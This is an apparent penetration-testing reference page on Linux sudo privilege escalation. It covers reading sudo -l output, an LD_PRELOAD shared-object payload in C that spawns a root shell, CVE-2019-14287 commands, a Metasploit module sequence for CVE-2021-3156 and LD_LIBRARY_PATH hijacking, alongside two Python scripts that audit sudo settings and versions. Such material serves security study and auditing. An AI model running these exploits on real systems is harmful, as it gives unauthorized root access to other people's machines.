sudo privilege escalation

An excellent reference to exploit sudo: SUDO_KILLER. List the members of the sudo group with getent group sudo.

If you have sudo rights, you can list them with:

$ sudo -nl # non-interactive: fails instead of prompting for a password
$ sudo -l # prompts for your password if one is required

The first section lists the Defaults settings, including how the environment is handled; some of them may be exploitable, such as env_keep preserving LD_PRELOAD.

Matching Defaults entries for [...]:
    [...] # something here

The second section lists your sudoers rights. Such commands may be exploitable to get root; look the command up on GTFOBins under #sudo.

User [...] may run the following commands on [...]:
    (root) /bin/tar

➡️ For instance, the user above can run /bin/tar as root.

📚 Sometimes, instead of root, we may only be able to run commands as another user, such as /opt/script.sh as user xxx. Use sudo -u xxx.

πŸ€ Sometimes, patterns are used in commands/paths. In a path, it means we can use ../. In a command, we can use any option.

User [...] may run the following commands on [...]:
    (root) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /usr/bin/vim
    (xxx) NOPASSWD: /opt/*.sh
    (root) /usr/bin/ssh *
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3

☠️ If you can only execute the script and not read it, either check whether the script uses an injectable parameter, or try to find the source code somewhere else (ex: on Git).

⚠️ A configuration may contain both env_keep and env_reset: env_reset clears the environment first, then the variables listed in env_keep are preserved.


LD_PRELOAD

If there is env_keep += LD_PRELOAD in the Defaults displayed by sudo -l, OR if there is no env_reset, then we can set LD_PRELOAD and run code before the command executes.
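Reading sudo -l output by hand is error-prone on a host with many entries. The following added script (not part of the original page, nor of SUDO_KILLER) parses the two sections described above and flags the conditions this page discusses: a missing env_reset, env_keep preserving LD_PRELOAD or LD_LIBRARY_PATH (see the Additional Notes), SETENV, NOPASSWD and wildcards in a command entry. The sample output, the user alice and the host name are constructed; the names parse_sudo_l and audit_sudo_l are the script's own.

```python
import re

# Constructed sample of `sudo -l` output (not captured from a real host); it
# combines the Defaults and command entries shown on this page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on host:
    (root) NOPASSWD: /usr/bin/vim
    (xxx) NOPASSWD: /opt/*.sh
    (root) /usr/bin/ssh *
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
"""

# Variables that let the caller inject code into whatever sudo runs.
RISKY_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# "(runas[ : group]) TAG: TAG: command args"
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")
ENV_KEEP_RE = re.compile(r'^env_keep\s*\+?=\s*"?([^"]+?)"?$')


def parse_sudo_l(text):
    """Split `sudo -l` output into Defaults tokens and command entries."""
    defaults, entries, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if re.match(r"^User \S+ may run the following commands", line):
            section = "commands"
            continue
        if section == "defaults":
            # Defaults are comma separated and may wrap over several lines.
            defaults.extend(tok.strip() for tok in line.split(",") if tok.strip())
        elif section == "commands":
            m = ENTRY_RE.match(line)
            if m:
                entries.append({
                    "runas": m.group("runas").split(":")[0].strip(),
                    "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
                    "cmd": m.group("cmd").strip(),
                })
    return defaults, entries


def audit_sudo_l(text):
    """Return the parsed entries plus a list of human-readable findings."""
    defaults, entries = parse_sudo_l(text)
    findings = []

    env_reset = "env_reset" in defaults
    if not env_reset:
        findings.append("no env_reset: the caller's environment (LD_PRELOAD included) reaches every sudo command")

    kept = set()
    for tok in defaults:
        m = ENV_KEEP_RE.match(tok)
        if m:
            kept.update(m.group(1).split())
    for var in sorted(kept & RISKY_ENV):
        findings.append(f"env_keep preserves {var}: arbitrary code runs inside every sudo command")

    for e in entries:
        where = f"({e['runas']}) {e['cmd']}"
        if "SETENV" in e["tags"]:
            findings.append(f"SETENV on {where}: caller may override env_reset for this command")
        if any(ch in e["cmd"] for ch in "*?["):
            findings.append(f"wildcard in {where}: ../ traversal or arbitrary arguments are possible")
        if "NOPASSWD" in e["tags"]:
            findings.append(f"NOPASSWD on {where}: no authentication step to alert on")

    return {"env_reset": env_reset, "env_keep": sorted(kept), "entries": entries, "findings": findings}


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L)["findings"]:
        print("-", finding)
```

On a real host, feed it the output of sudo -l (for example audit_sudo_l(subprocess.run(["sudo", "-nl"], capture_output=True, text=True).stdout)); an empty findings list for a user means none of the conditions above apply, not that every remaining entry is safe, since the script does not know which binaries on GTFOBins spawn a shell.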

The code below replaces the gid/uid of the process running the command with 0 (root). Then, it pops a bash shell (as root!).

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* _init runs when the dynamic linker loads this object, i.e. before the
 * sudo'd command's main(). setgid/setuid succeed because sudo already
 * started the process as root. */
void _init() {
    unsetenv("LD_PRELOAD"); /* otherwise the spawned shell reloads this object */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compile it with one of the following (the -nostartfiles form avoids a clash between your _init and the one supplied by the C runtime start files):

$ cd /tmp
$ gcc -shared -fPIC init.c -o init.so
$ gcc -shared -fPIC init.c -o init.so -nostartfiles

Then, call the command that you could run as administrator (tar here), while setting LD_PRELOAD to the path of your shared object:

$ sudo LD_PRELOAD=/tmp/init.so tar

💎 Congratulations, you are root now!


Well-known Vulnerabilities

sudo before 1.8.28 (CVE-2019-14287)

If a user was allowed to run one specific command using sudo, such as tar, then it was possible for any other user to impersonate the authorized user, and run the command as root too.

$ sudo -u#-1 tar [...]
$ sudo -u#4294967295 tar [...]

💎 Congratulations, you are root now!

sudo before 1.9.5p2 (CVE-2021-3156)

See metasploit module: exploit/linux/local/sudo_baron_samedit.

msf6> use exploit/linux/local/sudo_baron_samedit
msf6> set SESSION 1
msf6> set LHOST tun0
msf6> run
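The two advisories above are version-bound, so the first check on any host is sudo --version. The following added script (not part of the original page) parses that output into a comparable tuple, treating the pN patch level correctly (1.9.5 and 1.9.5p1 sort before 1.9.5p2), and lists which of the two fixed-in versions named on this page the host has not reached. The only fact it encodes is the pair of fixed versions given above; the function names are the script's own. Treat a match as a screen, not proof: distributions backport fixes without changing the upstream version string, so confirm against the distribution's package changelog before concluding a host is affected.

```python
import re

# First fixed releases named on this page, in (advisory, version) form.
FIXED_IN = (
    ("CVE-2019-14287", "1.8.28"),
    ("CVE-2021-3156", "1.9.5p2"),
)

# major.minor.patch with an optional pN patch level, e.g. 1.9.5p2
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """Turn 'Sudo version 1.9.5p1' (or a bare '1.8.31') into a comparable tuple.

    A missing pN patch level counts as 0, so 1.9.5 sorts before 1.9.5p2.
    """
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def unpatched_advisories(text):
    """List the advisories whose first fixed release is newer than this sudo."""
    ver = parse_sudo_version(text)
    return [cve for cve, fixed in FIXED_IN if ver < parse_sudo_version(fixed)]


if __name__ == "__main__":
    import subprocess
    try:
        # First line of `sudo --version` reads e.g. "Sudo version 1.8.31".
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
        print(unpatched_advisories(out.splitlines()[0]) or "no version-based match")
    except FileNotFoundError:
        print("sudo is not installed")
```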

Additional Notes

LD_LIBRARY_PATH

While uncommon, if the sudo configuration includes env_keep+=LD_LIBRARY_PATH, we are able to point the dynamic linker at a custom folder of .so files. Refer to Shared Object Hijacking.

$ sudo LD_LIBRARY_PATH=/path/to/xx/ [...]